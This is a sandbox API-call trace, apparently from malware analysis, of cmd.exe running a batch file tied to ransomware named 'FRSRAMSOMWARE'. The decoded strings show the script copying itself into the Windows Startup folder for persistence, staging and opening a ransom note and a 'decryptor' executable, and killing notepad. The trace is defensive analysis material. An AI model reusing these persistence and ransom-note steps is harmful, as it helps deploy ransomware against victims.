lpDistanceToMoveHigh=0x0) returned 0x6ae [0120.201] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0120.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0120.201] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.201] GetFileType (hFile=0x24c) returned 0x1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0120.201] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0120.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0120.201] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.201] GetFileType (hFile=0x24c) returned 0x1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0120.201] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0120.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0120.201] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.201] GetFileType (hFile=0x24c) returned 0x1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0120.201] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0120.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0120.201] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.201] GetFileType (hFile=0x24c) returned 0x1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0120.202] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0120.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0120.202] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.202] GetFileType (hFile=0x24c) returned 0x1 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0120.202] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0120.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0120.202] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.202] GetFileType (hFile=0x24c) returned 0x1 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0120.202] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0120.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0120.202] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.202] GetFileType (hFile=0x24c) returned 0x1 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0120.202] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0120.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0120.202] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.202] GetFileType (hFile=0x24c) returned 0x1 [0120.202] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0120.203] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0120.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0120.203] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.203] GetFileType (hFile=0x24c) returned 0x1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0120.203] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0120.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0120.203] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.203] GetFileType (hFile=0x24c) returned 0x1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0120.203] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0120.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0120.203] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.203] GetFileType (hFile=0x24c) returned 0x1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0120.203] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0120.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0120.203] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.203] GetFileType (hFile=0x24c) returned 0x1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0120.203] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0120.203] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0120.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0120.204] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.204] GetFileType (hFile=0x24c) returned 0x1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0120.204] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0120.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0120.204] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.204] GetFileType (hFile=0x24c) returned 0x1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0120.204] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0120.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0120.204] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.204] GetFileType (hFile=0x24c) returned 0x1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0120.204] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0120.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0120.204] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.204] GetFileType (hFile=0x24c) returned 0x1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0120.204] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0120.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0120.204] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.204] GetFileType (hFile=0x24c) returned 0x1 [0120.204] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0120.205] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0120.205] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0120.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0120.205] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0120.205] _get_osfhandle (_FileHandle=1) returned 0x28 [0120.205] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0120.205] _get_osfhandle (_FileHandle=0) returned 0x24 [0120.205] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0120.205] SetConsoleInputExeNameW () returned 0x1 [0120.205] GetConsoleOutputCP () returned 0x1b5 [0120.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0120.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.206] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0120.206] _open_osfhandle (_OSFileHandle=0x24c, _Flags=8) returned 3 [0120.206] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.206] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0120.206] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0120.206] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0120.206] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0120.206] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0120.206] GetFileType (hFile=0x24c) returned 0x1 [0120.206] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.206] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0120.206] _tell (_FileHandle=3) returned 2512 [0120.206] _close (_FileHandle=3) returned 0 [0120.206] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0120.206] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0120.206] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0120.206] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0120.206] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0120.206] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0120.206] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0120.206] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0120.206] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0120.206] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0120.206] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0120.206] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0120.206] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0120.206] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0120.206] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0120.206] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0120.206] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0120.207] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0120.207] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0120.207] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0120.207] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0120.207] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0120.207] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0120.207] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0120.207] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0120.207] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0120.207] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0120.207] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0120.207] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0120.207] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0120.207] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0120.207] _wcsicmp (_String1="ping", _String2="START") returned -3 [0120.207] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0120.207] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0120.207] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0120.207] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0120.207] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0120.207] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0120.207] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0120.207] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0120.207] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0120.207] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0120.207] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0120.207] SetErrorMode (uMode=0x0) returned 0x0 [0120.207] SetErrorMode (uMode=0x1) returned 0x0 [0120.207] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0120.207] SetErrorMode (uMode=0x0) returned 0x1 [0120.207] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0120.207] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.207] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 